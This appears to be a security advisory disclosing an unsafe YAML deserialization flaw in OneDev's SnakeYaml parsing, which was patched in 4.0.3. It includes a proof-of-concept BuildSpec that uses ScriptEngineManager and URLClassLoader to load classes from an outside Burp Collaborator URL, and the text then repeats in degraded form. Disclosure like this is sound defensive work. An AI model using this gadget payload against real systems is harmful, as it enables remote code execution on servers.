Impact
In order to parse and process YAML files, OneDev uses SnakeYaml which by default (when not using SafeConstructor) allows the instantiation of arbitrary classes. We can leverage that to run arbitrary code by instantiating classes such as javax.script.ScriptEngineManager and using URLClassLoader to load the script engine provider, resulting in the instantiation of a user controlled class. We can observe that by providing the following BuildSpec:
version: 1
jobs:
- name: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://qgayzevwou8by0k3ochje4ebx23srh.burpcollaborator.net"]]]]
image: asdasd
commands:
- asd
retrieveSource: true
cloneCredential: !DefaultCredential {}
cpuRequirement: 250m
memoryRequirement: 128m
retryCondition: never
maxRetries: 3
retryDelay: 30
timeout: 3600
By intercepting the resolution of the provided URL, we can prove that the payload succeeded.
This issue may lead to post-auth RCE
Patches
This issue was addressed in 4.0.3 by only allowing certain known classes to be deserialized
Credits
This issue was discovered by @pwntester
Impact
In order to parse and process YAML files, OneDev uses SnakeYaml which by default (when not using
SafeConstructor) allows the instantiation of arbitrary classes. We can leverage that to run arbitrary code by instantiating classes such asjavax.script.ScriptEngineManagerand usingURLClassLoaderto load the script engine provider, resulting in the instantiation of a user controlled class. We can observe that by providing the following BuildSpec:By intercepting the resolution of the provided URL, we can prove that the payload succeeded.
This issue may lead to
post-auth RCEPatches
This issue was addressed in 4.0.3 by only allowing certain known classes to be deserialized
Credits
This issue was discovered by @pwntester